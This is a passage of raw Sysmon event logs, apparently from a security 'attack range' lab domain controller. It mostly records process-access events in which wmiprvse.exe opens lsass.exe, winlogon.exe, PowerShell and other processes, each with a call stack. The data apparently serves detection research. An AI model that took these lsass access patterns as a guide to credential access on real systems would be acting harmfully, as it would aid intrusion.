14:10:04.103{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1200-00000000AD01}392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204373Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.087{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1100-00000000AD01}620C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204372Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.087{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-1000-00000000AD01}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204371Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.087{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0F00-00000000AD01}296C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204370Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.087{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0E00-00000000AD01}1012C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204369Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.087{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0D00-00000000AD01}912C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204368Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.087{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842F-603E-0C00-00000000AD01}852C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204367Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.087{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204366Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.087{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-842D-603E-0900-00000000AD01}572C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002204365Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.087{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C290F00821E1DFADF4471ED873A3B5B8,SHA256=CA3A6F9E059C0DC304CCC6B3E907E7EFF5B9C16D3FD8836CB6ADFBCD138E917C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204364Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.072{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D502-6040-CE4B-00000000AD01}1376C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204363Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.072{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204362Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.072{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B82D-00000000AD01}5444C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204361Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.072{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B72D-00000000AD01}5372c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204360Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.072{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F2-603F-B62D-00000000AD01}6644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204359Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.072{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F0-603F-B52D-00000000AD01}4336C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204358Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.072{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-D4F0-603F-B42D-00000000AD01}2724C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204357Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.072{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-ADE1-603E-4F0A-00000000AD01}7004C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204356Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.072{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-9B0C-603E-D607-00000000AD01}6796C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204355Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.072{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-9A00-603E-9E07-00000000AD01}4168C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002204354Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:04.072{5ABCFE62-EA3B-6040-644E-00000000AD01}37164032C:\Windows\system32\wbem\wmiprvse.exe{5ABCFE62-99FF-603E-9D07-00000000AD01}2780C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.